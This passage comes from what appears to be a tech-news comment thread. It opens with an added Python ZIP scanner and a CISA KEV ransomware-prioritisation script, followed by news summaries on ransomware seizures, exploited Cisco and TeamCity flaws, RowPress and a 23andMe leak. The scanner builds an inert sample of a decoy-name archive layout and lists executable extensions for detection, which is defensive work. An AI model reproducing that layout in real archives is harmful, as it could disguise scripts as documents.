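Added example (not the article's code). Flags a ZIP in which a top-level file
that looks like a document or image shares its name, ignoring trailing
whitespace, with a directory that contains a script or executable. The sample
archives below are constructed in memory with placeholder bodies.
"""
import io
import os
import zipfile
from typing import Dict, List, Set

DECOY_EXTENSIONS: Set[str] = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt", ".doc", ".docx"}
EXECUTABLE_EXTENSIONS: Set[str] = {".cmd", ".bat", ".ps1", ".vbs", ".js", ".exe", ".scr", ".lnk"}


def normalized_ext(name: str) -> str:
    """Lower-cased extension of a path component after trailing whitespace is removed."""
    return os.path.splitext(name.rstrip())[1].lower()


def scan_archive(data: bytes) -> List[str]:
    """Return human-readable findings for one ZIP archive held in memory."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()

    # Top-level files whose extension suggests a harmless document or image.
    decoys: Dict[str, str] = {}
    for n in names:
        if "/" not in n and normalized_ext(n) in DECOY_EXTENSIONS:
            decoys[n.rstrip()] = n

    # Executables inside a directory whose name matches a decoy file name.
    for n in names:
        if "/" not in n or n.endswith("/"):
            continue
        top, rest = n.split("/", 1)
        leaf = rest.rsplit("/", 1)[-1]
        if top.rstrip() in decoys and normalized_ext(leaf) in EXECUTABLE_EXTENSIONS:
            findings.append(
                f"decoy file {decoys[top.rstrip()]!r} shadowed by executable entry {n!r}"
            )

    # Independent signal: a last path component ending in whitespace is unusual.
    for n in names:
        leaf = n.rstrip("/").rsplit("/", 1)[-1]
        if leaf != leaf.rstrip():
            findings.append(f"trailing whitespace in entry name: {n!r}")
    return findings


def _build(entries: Dict[str, bytes]) -> bytes:
    """Write the given name->content mapping into an in-memory ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def benign_archive() -> bytes:
    """Constructed archive with an ordinary layout."""
    return _build({
        "report.pdf": b"%PDF-1.4 placeholder",
        "photos/holiday.jpg": b"\xff\xd8 placeholder",
    })


def suspicious_archive() -> bytes:
    """Constructed archive: decoy file plus same-named directory holding a script.

    The script body is an inert placeholder; only the entry names matter here.
    """
    return _build({
        "invoice.pdf ": b"%PDF-1.4 placeholder",
        "invoice.pdf /invoice.pdf .cmd": b"rem constructed placeholder, does nothing\r\n",
    })


if __name__ == "__main__":
    for label, blob in (("benign", benign_archive()), ("suspicious", suspicious_archive())):
        print(label, scan_archive(blob) or "no findings")
```

The scanner works on the central directory only, so it never extracts anything; feeding it archives from a mail gateway quarantine or a download directory is enough to triage them. Legitimate archives can of course contain a file and a folder with the same stem, so treat a hit as a prompt for review rather than a verdict.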
  30. Tomi Engdahl says:

    RT Watson / The Block:
Chainalysis says recent media reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses” — Chainalysis said some recent reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses.”

    Chainalysis says some reports might be overestimating crypto’s role in terrorist financing
    https://www.theblock.co/post/258284/chainalysis-says-some-reports-might-be-overestimating-cryptos-role-in-terrorist-financing

    Chainalysis said some recent reports about the supposed use of crypto by terrorist organizations might be overstating metrics and using “flawed analyses.”

In the wake of the recent Hamas attack in Israel, crypto analytics firm Chainalysis said Wednesday that it’s been receiving lots of questions about how terrorist groups might be using cryptocurrency. But it said some reports about the supposed use might be overstating metrics and using “flawed analyses.”

    “Although terrorism financing is a very small portion of the already very small portion of cryptocurrency transaction volume that is illicit, some terrorist organizations raise, store, and transfer funds using cryptocurrency,” it wrote in a blog post. “Terrorist organizations have historically used and will likely continue to use traditional, fiat-based methods such as financial institutions, hawalas, and shell companies as their primary financing vehicles.”

In the aftermath of Hamas’ terrorist attack on Israel, various media outlets have sought to estimate the level of illicit crypto funds that may have been funneled into the offensive. Sen. Elizabeth Warren, D-Mass., along with more than a hundred other lawmakers, on Wednesday cited a report from the Wall Street Journal about Hamas’ supposed use of crypto and said she wants answers from the administration of President Joe Biden.

    Reply
  31. Tomi Engdahl says:

    Reuters:
    Meta introduces temporary limits on “potentially unwelcome or unwanted comments” on Facebook posts about the Israel-Hamas war for users “in the region”

    Meta to limit some Facebook comments on Israeli, Palestinian posts
    https://www.reuters.com/world/middle-east/meta-limit-some-facebook-comments-israeli-palestinian-posts-2023-10-18/

    NEW YORK, Oct 18 (Reuters) – Facebook-owner Meta Platforms (META.O) on Wednesday introduced temporary measures to limit “potentially unwelcome or unwanted comments” on posts about the conflict between Israel and Hamas.

    Meta said it will change the default setting for people who can comment on new and public Facebook posts created by users “in the region” to only their friends and followers, Meta said in an updated blog post.

A Meta spokesperson declined to specify how the company defined the region. Users can opt out and change the setting at any time, Meta said.

    Reply
  32. Tomi Engdahl says:

    Abner Li / 9to5Google:
    Google updates Play Protect with real-time scanning at the code level, prompting users to scan unknown Android apps before sideloading, starting in India — To avoid detection, Google has found that malicious parties are looking beyond the Play Store to infect Android devices with malware.

    Google Play Protect will prompt you to scan unknown apps before sideloading
    https://9to5google.com/2023/10/18/google-play-protect-scan/

    To avoid detection, Google has found that malicious parties are looking beyond the Play Store to infect Android devices with malware. In response, Google is updating Play Protect and extending its scan protections.

    When you install apps via sideloading (outside of Google Play), Play Protect already runs real-time checks that leverage “existing scanning intelligence,” on-device machine learning, similarity comparisons, and other techniques. The company finds that “downloads directly through messaging apps” are a common origin, citing social engineering tactics.

    Reply
  33. Tomi Engdahl says:

CISA Now Flagging Vulnerabilities, Misconfigurations Exploited by Ransomware
    https://www.securityweek.com/cisa-now-flagging-vulnerabilities-misconfigurations-exploited-by-ransomware/

    CISA is now flagging vulnerabilities and misconfigurations that are known to be exploited in ransomware attacks.

    The US cybersecurity agency CISA is stepping up its efforts to prevent ransomware by making it easier for organizations to learn about vulnerabilities and misconfigurations exploited in these attacks.

    As part of its Ransomware Vulnerability Warning Pilot (RVWP) program launched in March, the agency has released two new resources to help organizations identify and eliminate security flaws and weaknesses known to be exploited by ransomware groups.

    “Through the RVWP, CISA determines vulnerabilities that are commonly associated with known ransomware exploitation and warns critical infrastructure entities with those vulnerabilities, helping to enable mitigation before a ransomware incident occurs,” CISA notes.

    The first of these resources is a new column in the Known Exploited Vulnerabilities catalog, which flags flaws that CISA is aware of being associated with ransomware campaigns.

    https://www.cisa.gov/known-exploited-vulnerabilities-catalog

    Reply
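The SecurityWeek item above notes that the KEV catalog gained a column flagging entries associated with ransomware campaigns. As an added example, not code from CISA or from the article, the script below parses a KEV-style JSON document, keeps only the ransomware-flagged records, and matches them against a local product inventory ordered by how far past the CISA due date each one is. The field name `knownRansomwareCampaignUse` and the overall document layout are assumptions about the JSON feed linked from the catalog page; the sample document is constructed, and its flag values and dates are illustrative rather than the catalog's real ones.

```python
"""Pull ransomware-flagged entries out of a CISA KEV catalog JSON document.

Added example, not code from the page. The catalog layout and the field name
``knownRansomwareCampaignUse`` are assumptions about the KEV JSON feed, and the
sample document below is constructed (flag values and dates are illustrative).
"""
import json
from datetime import date
from typing import Any, Dict, Iterable, List, Set, Tuple

# Constructed miniature of the feed. The two real CVE ids appear on this page;
# CVE-0000-00000 is an obvious placeholder.
SAMPLE_KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "count": 3,
    "vulnerabilities": [
        {
            "cveID": "CVE-2023-38831",
            "vendorProject": "RARLAB",
            "product": "WinRAR",
            "dateAdded": "2023-08-24",
            "dueDate": "2023-09-14",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2023-42793",
            "vendorProject": "JetBrains",
            "product": "TeamCity",
            "dateAdded": "2023-10-04",
            "dueDate": "2023-10-25",
            "knownRansomwareCampaignUse": "Known",
        },
        {
            "cveID": "CVE-0000-00000",
            "vendorProject": "ExampleVendor",
            "product": "ExampleProduct",
            "dateAdded": "2023-09-01",
            "dueDate": "2023-09-22",
            "knownRansomwareCampaignUse": "Known",
        },
    ],
})

# Fixed "today" so the example is reproducible offline.
SAMPLE_TODAY = date(2023, 10, 20)


def load_entries(raw_json: str) -> List[Dict[str, Any]]:
    """Parse a KEV document and return its vulnerability records."""
    doc = json.loads(raw_json)
    entries = doc.get("vulnerabilities")
    if not isinstance(entries, list):
        raise ValueError("KEV document has no 'vulnerabilities' list")
    return entries


def ransomware_flagged(entries: Iterable[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Keep entries whose ransomware-use column reads 'Known' (case-insensitive)."""
    return [
        e for e in entries
        if str(e.get("knownRansomwareCampaignUse", "")).strip().lower() == "known"
    ]


def prioritize(
    entries: Iterable[Dict[str, Any]],
    inventory: Set[Tuple[str, str]],
    today: date,
) -> List[Tuple[str, int]]:
    """Ransomware-flagged CVEs for products in the inventory, most overdue first.

    inventory holds lower-cased (vendor, product) pairs. Each result is
    (cveID, days past dueDate); a negative number means the due date is ahead.
    """
    hits: List[Tuple[str, int]] = []
    for e in ransomware_flagged(entries):
        key = (str(e.get("vendorProject", "")).lower(), str(e.get("product", "")).lower())
        if key not in inventory:
            continue
        due = date.fromisoformat(e["dueDate"])
        hits.append((e["cveID"], (today - due).days))
    hits.sort(key=lambda h: h[1], reverse=True)
    return hits


if __name__ == "__main__":
    inv = {("jetbrains", "teamcity"), ("rarlab", "winrar")}
    for cve, overdue in prioritize(load_entries(SAMPLE_KEV_JSON), inv, SAMPLE_TODAY):
        print(cve, "overdue by" if overdue > 0 else "due in", abs(overdue), "days")
```

In practice the document would come from the feed linked on the catalog page rather than the inline sample, and the inventory from a CMDB or software-asset export; the ordering by days past due date gives a patch queue that puts ransomware-associated, already-overdue items first.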
  34. Tomi Engdahl says:

    Carly Page / TechCrunch:
    Law enforcement agencies, including from the US, the EU, and Japan, seize the RagnarLocker ransomware group’s dark web portal as part of an “ongoing action” — An international group of law enforcement agencies have seized the dark web portal used by the notorious RagnarLocker ransomware group, TechCrunch has learned.

    RagnarLocker ransomware dark web site seized in international sting
    https://techcrunch.com/2023/10/19/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cudGVjaG1lbWUuY29tLw&guce_referrer_sig=AQAAAHR-E7hoMwuYqYBJEk_lUMA84YEaIhu-iAlEBsNJJGn688Z-wAVJXVBNxkV5H8hoBjnHWUQ3GevQ7r-vN8pHcwx6vWXCKie_sa8E3Kuk8bjR16Rp7FIFGDqqerW1yzU1ithu_siVwgWJZ2ARiqYAmvK7N4kS0HrjVU6cXQmvFE7V

    An international group of law enforcement agencies have seized the dark web portal used by the notorious RagnarLocker ransomware group, TechCrunch has learned.

    A message on the RagnarLocker website now states that, “this service has been seized by a part of a coordinated international law enforcement action against the RagnarLocker group.” According to the seizure notice, the operation involved law enforcement agencies from the United States, the European Union and Japan.

    The full scale of the operation is not yet known, and it’s unclear whether the gang’s infrastructure was also seized, if any arrests were made or whether any stolen funds have been recovered.

    Reply
  35. Tomi Engdahl says:

    Cisco IOS XE vulnerability widely exploited in the wild https://www.malwarebytes.com/blog/news/2023/10/cisco-ios-xe-vulnerability-widely-exploited-in-the-wild

An authentication bypass affecting Cisco IOS XE was disclosed on October 16, 2023. Researchers have found since then that the vulnerability is being widely exploited in the wild to help install implants on affected switches and routers.

    Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.

    Reply
  36. Tomi Engdahl says:

    Microsoft Warns of North Korean Attacks Exploiting JetBrains TeamCity Flaw https://thehackernews.com/2023/10/microsoft-warns-of-north-korean-attacks.html

    North Korean threat actors are actively exploiting a critical security flaw in JetBrains TeamCity to opportunistically breach vulnerable servers, according to Microsoft.

The attacks, which entail the exploitation of CVE-2023-42793 (CVSS score: 9.8), have been attributed to Diamond Sleet (aka Labyrinth Chollima) and Onyx Sleet (aka Andariel or Silent Chollima).

    It’s worth noting that both the threat activity clusters are part of the infamous North Korean nation-state actor known as Lazarus Group.

    In one of the two attack paths employed by Diamond Sleet, a successful compromise of TeamCity servers is followed by the deployment of a known implant called ForestTiger from legitimate infrastructure previously compromised by the threat actor.

    Reply
  37. Tomi Engdahl says:

    Iranian hackers lurked in Middle Eastern govt network for 8 months https://www.bleepingcomputer.com/news/security/iranian-hackers-lurked-in-middle-eastern-govt-network-for-8-months/

    The Iranian hacking group tracked as MuddyWater (aka APT34 or OilRig) breached at least twelve computers belonging to a Middle Eastern government network and maintained access for eight months between February and September 2023.

    MuddyWater is linked to Iran’s Ministry of Intelligence and Security (MOIS), known for mounting attacks against the U.S., the Middle East, and Albania.

The attacks observed by Symantec’s threat hunter team, part of Broadcom, were used to steal passwords and data, as well as to install a PowerShell backdoor dubbed ‘PowerExchange’, which accepted commands for execution via Microsoft Exchange.

    Reply
  38. Tomi Engdahl says:

    Ragnar Locker ransomware’s dark web extortion sites seized by police https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomwares-dark-web-extortion-sites-seized-by-police/

    The Ragnar Locker ransomware operation’s Tor negotiation and data leak sites were seized Thursday morning as part of an international law enforcement operation.

    BleepingComputer has confirmed that visiting either website now displays a seizure message stating that a large assortment of international law enforcement from the US, Europe, Germany, France, Italy, Japan, Spain, Netherlands, Czech Republic, and Latvia were involved in the operation.

    “This service has been seized as part of a coordinated law enforcement action against the Ragnar Locker group,” reads the message.

    A Europol spokesperson has confirmed the seizure message is legitimate as part of an ongoing action targeting the Ragnar Locker ransomware gang and that a press release will be published tomorrow. The FBI declined to comment.

    Reply
  39. Tomi Engdahl says:

A professional group close to some state is behind the Säkylä cyberattack, municipal manager tight-lipped: ”We don’t do foreign policy”
    https://yle.fi/a/74-20055949

    The cyberattack against Säkylä last December is believed to have been carried out by a professional group operating close to some state.

    According to Säkylä’s municipal manager Teijo Mäenpää, the investigation has shown that the clear purpose of the intrusion was to disrupt the municipality’s operations.

    – Our understanding is that a professional actor operating close to a state was behind it. Not Finnish and not Swedish, but we take no position on the country it is located in. The municipality of Säkylä does not do foreign policy, Mäenpää says.

    Reply
  40. Tomi Engdahl says:

    There’s a new way to flip bits in DRAM, and it works against the latest defenses
    https://arstechnica.com/security/2023/10/theres-a-new-way-to-flip-bits-in-dram-and-it-works-against-the-latest-defenses/
New technique produces lots of bitflips and could one day help form an attack.

    In 2015, researchers reported a surprising discovery that stoked industry-wide security concerns—an attack called RowHammer that could corrupt, modify, or steal sensitive data when a simple user-level application repeatedly accessed certain regions of DDR memory chips. In the coming years, memory chipmakers scrambled to develop defenses that prevented the attack, mainly by limiting the number of times programs could open and close the targeted chip regions in a given time.

    Recently, researchers devised a new method for creating the same types of RowHammer-induced bitflips even on a newer generation of chips, known as DDR4, that have the RowHammer mitigations built into them. Known as RowPress, the new attack works not by “hammering” carefully selected regions repeatedly, but instead by leaving them open for longer periods than normal. Bitflips refer to the phenomenon of bits represented as ones changing to zeros and vice versa.

    Further amplifying the vulnerability of DDR4 chips to read-disturbance attacks—the generic term for inducing bitflips through abnormal accesses (i.e., activations) to memory chips—RowPress bitflips can be enhanced by combining them with RowHammer accesses. Curiously, raising the temperature of the chip also intensifies the effect.

    “We demonstrate a proof of concept RowPress program that can cause bitflips in a real system that already employs protections against RowHammer,” Onur Mutlu, a professor at ETH Zürich and a co-author of a recently published paper titled RowPress: Amplifying Read Disturbance in Modern DRAM Chips, wrote in an email. “Note that this is not in itself an attack. It simply shows that bitflips are possible and plenty, which can easily form the basis of an attack. As many prior works in security have shown, once you can induce a bitflip, you can use that bitflip for various attacks.”

    RowPress: Amplifying Read Disturbance in Modern DRAM Chips
    https://people.inf.ethz.ch/omutlu/pub/RowPress_isca23.pdf

    Memory isolation is critical for system reliability, security, and safety. Unfortunately, read disturbance can break memory isolation in modern DRAM chips. For example, RowHammer is a well-studied read-disturb phenomenon where repeatedly opening and closing (i.e., hammering) a DRAM row many times causes bitflips in physically nearby rows.

    This paper experimentally demonstrates and analyzes another widespread read-disturb phenomenon, RowPress, in real DDR4 DRAM chips. RowPress breaks memory isolation by keeping a DRAM row open for a long period of time, which disturbs physically nearby rows enough to cause bitflips. We show that RowPress amplifies DRAM’s vulnerability to read-disturb attacks by significantly reducing the number of row activations needed to induce a bitflip by one to two orders of magnitude under realistic conditions

    Reply
  41. Tomi Engdahl says:

    Harmonic Lands $7M Funding to Secure Generative AI Deployments
    https://www.securityweek.com/harmonic-lands-7m-funding-to-secure-generative-ai-deployments/

    British startup is working on software to mitigate against the ‘wild west’ of unregulated AI apps harvesting company data at scale.

    Reply
  42. Tomi Engdahl says:

    Lorenzo Franceschi-Bicchierai / TechCrunch:
    23andMe is investigating a possible new data leak of 4M users’ records on BreachForums; the hacker claims the stolen dataset includes info on people from the UK — The same hacker who leaked a trove of user data stolen from the genetic testing company 23andMe two weeks ago has now leaked millions of new user records.

    Hacker leaks millions more 23andMe user records on cybercrime forum
    https://techcrunch.com/2023/10/18/hacker-leaks-millions-more-23andme-user-records-on-cybercrime-forum/

    Reply
